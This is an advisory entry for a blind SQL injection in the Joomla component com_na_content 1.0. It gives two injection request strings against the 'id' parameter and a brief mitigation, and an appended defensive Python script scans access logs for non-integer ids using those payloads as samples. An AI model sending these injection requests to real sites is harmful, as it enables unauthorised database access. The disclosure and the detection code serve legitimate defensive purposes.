vendor: Joomla Component com_na_content
by: xoron
CVSS: 7.5 HIGH
Blind SQL Injection
CWE: 89
Product Name: Joomla Component com_na_content
Affected Version From: 1
Affected Version To: 1
Patch Exists: N/A
Related CWE: N/A
CPE: a:joomla:joomla:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Joomla Component com_na_content 1.0 Blind SQL Injection Vuln
A blind SQL injection vulnerability exists in Joomla Component com_na_content 1.0. The vulnerable parameter is ‘id’, which is passed as a GET parameter in the request. An attacker can exploit it by sending specially crafted requests: SQL injected into the ‘id’ parameter is executed in the backend database. Example requests:
/index.php?option=com_na_content&task=view&id=1 having 1=0
/index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=4
Mitigation:
Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.
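
A defender-side check built from the two example requests above (an added example, not part of the original advisory or of the component's code): it scans web server access logs for com_na_content requests whose id value is not a plain integer. Combined log format is assumed, and the log lines, IP addresses and function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-log-format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A legitimate article id is assumed to be decimal digits only.
INTEGER_RE = re.compile(r"[0-9]+")

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] '
    '"GET /index.php?option=com_na_content&task=view&id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2008:10:00:05 +0000] '
    '"GET /index.php?option=com_na_content&task=view&id=1%20having%201=0 HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2008:10:00:06 +0000] '
    '"GET /index.php?option=com_na_content&task=view&id=1+and+substring(@@version,1,1)=4 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2008:10:00:09 +0000] '
    '"GET /index.php?option=com_content&task=view&id=7 HTTP/1.1" 200 4096',
]


def suspicious_requests(log_lines):
    """Return (line_no, decoded id) for com_na_content requests with a non-integer id."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        # parse_qs URL-decodes values, so %20 and + both become spaces.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "com_na_content" not in query.get("option", []):
            continue  # other components are out of scope for this check
        for value in query.get("id", []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((line_no, value))
    return hits


if __name__ == "__main__":
    for line_no, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: non-integer id {value!r}")
```

The same digits-only rule is the validation the mitigation calls for on the server side: an id that fails it should be rejected before it reaches any SQL query.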